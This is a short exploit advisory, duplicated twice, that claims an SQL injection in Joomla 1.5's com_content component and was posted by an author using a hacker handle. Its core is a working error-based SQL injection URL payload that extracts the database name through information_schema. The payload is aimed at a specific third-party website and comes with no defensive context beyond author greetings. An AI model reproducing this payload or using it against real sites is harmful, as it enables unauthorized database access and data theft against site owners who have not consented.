[php]################################################## ##############
# Exploit Title: Joomla Component (com_content) SQL Injection Vulnerability
# Google Dork:Use yOur M!nd ^_^
# Date: 4/6/2012
# Home: http://www.sec-art.net
# Exploit Author: Cyb3r-R00T
# Version: Joomla! 1.5 - Open Source Content Management
# Tested on: Debian GNU/Linux,Windows 7 Ultimate
################################################## ##############
[~]Exploit/p0c :
[~]Example :
http://www.greenmining.or.id/index.php?option=com_content&view=category&id=75 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--pt-newmont&Itemid=3
#Greetz 2#~ Karar alShaMi; Faris; H311 C0D3; TiGER-M@TE; RiSKy and all Sec-Art.net Members [/php]
# Exploit Title: Joomla Component (com_content) SQL Injection Vulnerability
# Google Dork:Use yOur M!nd ^_^
# Date: 4/6/2012
# Home: http://www.sec-art.net
# Exploit Author: Cyb3r-R00T
# Version: Joomla! 1.5 - Open Source Content Management
# Tested on: Debian GNU/Linux,Windows 7 Ultimate
################################################## ##############
[~]Exploit/p0c :
[~]Example :
http://www.greenmining.or.id/index.php?option=com_content&view=category&id=75 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--pt-newmont&Itemid=3
#Greetz 2#~ Karar alShaMi; Faris; H311 C0D3; TiGER-M@TE; RiSKy and all Sec-Art.net Members [/php]